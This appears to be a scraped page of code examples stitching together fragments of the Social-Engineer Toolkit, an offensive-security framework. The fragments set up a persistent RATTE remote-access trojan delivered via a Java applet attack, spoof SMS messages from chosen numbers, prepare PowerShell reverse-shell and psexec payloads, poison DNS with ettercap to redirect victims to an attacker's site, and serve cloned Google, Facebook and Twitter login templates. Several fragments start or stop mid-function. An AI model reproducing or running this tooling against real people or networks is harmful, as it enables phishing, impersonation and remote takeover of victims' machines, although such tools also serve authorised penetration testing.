        core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
    #javaport must be 80, cause applet uses in web injection port 80 to download payload!
    try:
        javaport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port java applet should listen on (ex. 443)")))
        while javaport == 0 or javaport > 65535:
            javaport = int(
                raw_input(
                    core.setprompt(["9", "2"],
                                   "Enter port java applet should listen on")))
    except ValueError:
        javaport = 80

    #javaport=80

    try:
        ratteport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            core.PrintWarning("Port must not be equal to javaport!")
            ratteport = int(
                raw_input(
                    core.setprompt(["9", "2"],
                                   "Port RATTE Server should listen on")))
    except ValueError:
        ratteport = 8080

    persistent = raw_input(
        core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    if persistent == "no" or persistent == "" or persistent == "n":
        persistent = "NO"
    else:
        persistent = "YES"

    customexe = raw_input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
    #if persistent == "no" or persistent == "" or persistent == "n":
    #	persistent="NO"
    #else:
    #	persistent="YES"

    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.PrintInfo("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
    for line in fileopen:
        ratte_random = line.rstrip()
    subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
                     (definepath, definepath, ratte_random),
                     shell=True).wait()

    #######################
    # start ratteserver
    #######################

    core.PrintInfo("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
コード例 #50
0
def launch():
    while 1:
        print (
            """
  1.  Pre-Defined Template
  2.  One-Time Use SMS

  99. Cancel and return to SMS Spoofing Menu
"""
        )
        template_choice = raw_input(core.setprompt(["7"], "Use a predefined template or craft a one time SMS?"))
        # if predefined template go here
        if template_choice == "1":
            # set path for
            path = "src/templates/sms/"
            filewrite = file("src/program_junk/sms.templates", "w")
            counter = 0
            # Pull all files in the templates directory
            for infile in glob.glob(os.path.join(path, "*.template")):
                infile = infile.split("/")
                # grab just the filename
                infile = infile[3]
                counter = counter + 1
                # put it in a format we can use later in a file
                filewrite.write(infile + " " + str(counter) + "\n")
            # close the file
            filewrite.close()
            # read in formatted filenames
            fileread = file("src/program_junk/sms.templates", "r").readlines()
            print "Below is a list of available templates:\n"
            for line in fileread:
                line = line.rstrip()
                line = line.split(" ")
                filename = line[0]
                # read in file
                fileread2 = file("src/templates/sms/%s" % (filename), "r").readlines()
                for line2 in fileread2:
                    match = re.search("SUBJECT=", line2)
                    if match:
                        line2 = line2.rstrip()
                        line2 = line2.split("=")
                        line2 = line2[1]
                        # strip double quotes
                        line2 = line2.replace('"', "")
                        # display results back
                        print line[1] + ": " + line2

            # allow user to select template
            choice = raw_input(core.setprompt(["7"], "Select template"))
            for line in fileread:
                # split based off of space
                line = line.split(" ")
                # search for the choice
                match = re.search(str(choice), line[1])
                if match:
                    extract = line[0]
                    fileopen = file("src/templates/sms/" + str(extract), "r").readlines()
                    for line2 in fileopen:
                        match2 = re.search("ORIGIN=", line2)
                        if match2:
                            origin = line2.replace('"', "")
                            origin = origin.split("=")
                            origin = origin[1]
                        match3 = re.search("SUBJECT=", line2)
                        if match3:
                            subject = line2.replace('"', "")
                            subject = subject.split("=")
                            subject = subject[1]
                        match4 = re.search("BODY=", line2)
                        if match4:
                            body = line2.replace('"', "")
                            body = body.replace(r"\n", " \n ")
                            body = body.split("=")
                            body = body[1]

            break
        if template_choice == "2":
            try:
                origin = raw_input(core.setprompt(["7"], "Source number phone"))
                body = raw_input(
                    core.setprompt(["7"], "Body of the message, hit return for a new line. Control+c when finished")
                )
                while body != "sdfsdfihdsfsodhdsofh":
                    try:
                        body += "\n"
                        body += raw_input("Next line of the body: ")
                    except KeyboardInterrupt:
                        break
            except KeyboardInterrupt:
                pass
            break

        if template_choice == "99":
            break

    if template_choice != "3":
        while 1:
            print (
                """
 Service Selection

 There are diferent services you can use for the SMS spoofing, select
 your own.

  1.  SohoOS (buggy)
  2.  Lleida.net (pay)
  3.  SMSGANG (pay)
  4.  Android Emulator (need to install Android Emulator)

  99. Cancel and return to SMS Spoofing Menu
"""
            )
            service_option = raw_input(core.setprompt(["7"], ""))
            # exit
            if service_option == "1":
                break
            if service_option == "2":
                break
            if service_option == "3":
                break
            if service_option == "4":
                break
            if service_option == "99":
                break

    if template_choice != "3" and service_option != "99":
        # sohoOS service
        if service_option == "1":
            for to in phones:
                send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()

        # Lleida.net service
        if service_option == "2":
            user = raw_input(core.setprompt(["7"], "Your Lleida.net user"))
            password = raw_input(core.setprompt(["7"], "Your Lleida.net password"))
            email = raw_input(core.setprompt(["7"], "Email for the receipt (optional)"))
            for to in phones:
                send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(), user, password, email)
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()

        # SMSGANG service
        if service_option == "3":
            pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode"))
            for to in phones:
                send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(), pincode)
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()

        # Andriod Emulator service
        if service_option == "4":
            for to in phones:
                send_android_emu_sms(origin.rstrip(), body.rstrip())
            # Finish here then return to main menu
            core.print_status("SET has completed!")
            core.return_continue()
コード例 #51
0
#   SMBPass                                       no        The password for the specified username
#   SMBSHARE   C$                                 yes       The name of a writeable share on the server
#   SMBUser                                       no        The username to authenticate as
#   THREADS    1                                  yes       The number of concurrent threads
#   WINPATH    WINDOWS                            yes       The name of the remote Windows directory

# msf auxiliary(psexec_command) >

# grab config options for stage encoding
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
    stage_encoding = "false"
else:
    stage_encoding = "true"

rhosts = input(core.setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to"))  # rhosts
# username for domain/workgroup
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(core.setprompt(["32"], "Enter the domain name (hit enter for logon locally)"))  # domain name
threads = input(core.setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "":
    domain = "WORKGROUP"
# set the threads
if threads == "":
    threads = "15"

payload = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
コード例 #52
0
            ipaddr=line
        if ettercapchoice == 'y':
           try:
                print """
  This attack will poison all victims on your local subnet, and redirect them
  when they hit a specific website. The next prompt will ask you which site you
  will want to trigger the DNS redirect on. A simple example of this is if you
  wanted to trigger everyone on your subnet to connect to you when they go to
  browse to www.google.com, the victim would then be redirected to your malicious
  site. You can alternatively poison everyone and everysite by using the wildcard 
  '*' flag.

  IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
"""
                setcore.PrintInfo("Example: http://www.google.com")
                dns_spoof=raw_input(setcore.setprompt("0", "Site to redirect to attack machine [*]"))
                os.chdir(path)
                # small fix for default
                if dns_spoof == "":
                        # set default to * (everything)
                        dns_spoof="*"
                # remove old stale files
                subprocess.Popen("rm etter.dns 1> /dev/null 2> /dev/null", shell=True).wait()
                # prep etter.dns for writing
                filewrite=file("etter.dns", "w")
                # send our information to etter.dns                
                filewrite.write("%s A %s" % (dns_spoof,ipaddr))
                # close the file
                filewrite.close()
                # set bridge variable to nothing
                bridge=""
コード例 #53
0
import subprocess

import src.core.setcore as core
from src.core.menu import text

# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
    input = raw_input
except NameError:
    pass

core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5)

show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = input(core.setprompt(["29"], ""))

if powershell_menu_choice != "99":
    # specify ipaddress of reverse listener
    #ipaddr = core.grab_ipaddress()
    ipaddr = raw_input("Enter the IPAddress or DNS name for the reverse host: ")
    core.update_options("IPADDR=" + ipaddr)

    # if we select alphanumeric shellcode
    if powershell_menu_choice == "1":
        port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
        if not port:
            port = "443"
        core.update_options("PORT=" + port)
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
コード例 #54
0
    payload_counter = 0
    choice = None
    for line in fileopen:
        line = line.rstrip()
        if counter == 0:
            choice = str(line)
        if counter == 1:
            payload_counter = 1
        counter += 1

    if choice != "14":
        # Open the IPADDR file
        if core.check_options("IPADDR=") != 0:
            ipaddr = core.check_options("IPADDR=")
        else:
            ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
            core.update_options("IPADDR=" + ipaddr)

    if not os.path.isfile(os.path.join(core.setdir + "teensy")):
        core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
        core.exit_set()


def writefile(filename, now):
    with open(os.path.join("src/teensy/" + filename)) as fileopen, \
            open(os.path.join(core.setdir + "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:

        for line in fileopen:
            match = re.search("IPADDR", line)
            if match:
                line = line.replace("IPADDR", ipaddr)
コード例 #55
0
dest = "src/html/"
url = ""

core.debug_msg(core.mod_name(), "entering src.html.templates.template'", 1)

#
# used for pre-defined templates
#
print("""
  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo
""")
choice = raw_input(core.setprompt(["2"], "Select a template"))

if choice == "exit":
    core.exit_set()

# file used for nextpage in java applet attack

# if nothing is selected
if choice == "":
    choice = "1"

# if java required
if choice == "1":
    if os.path.isfile("src/html/index.template"):
        os.remove("src/html/index.template")
    shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
コード例 #56
0
import subprocess
import _mssql
#
#
# Fast-Track Main options and interface menus
#
#
setcore.check_mssql()
try:
    while 1:
        ###################################################
        #        USER INPUT: SHOW WEB ATTACK MENU         #
        ###################################################

        setcore.CreateMenu(text.fasttrack_text, text.fasttrack_menu)
        attack_vector = raw_input(setcore.setprompt(["19"], ""))

        if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
            break

        ##################################
        ##################################
        # mssql_scanner
        ##################################
        ##################################
        if attack_vector == "1":
            # start the menu
            setcore.CreateMenu(text.fasttrack_mssql_text1,
                               text.fasttrack_mssql_menu1)
            # take input here
            attack_vector_sql = raw_input(setcore.setprompt(["19", "21"], ""))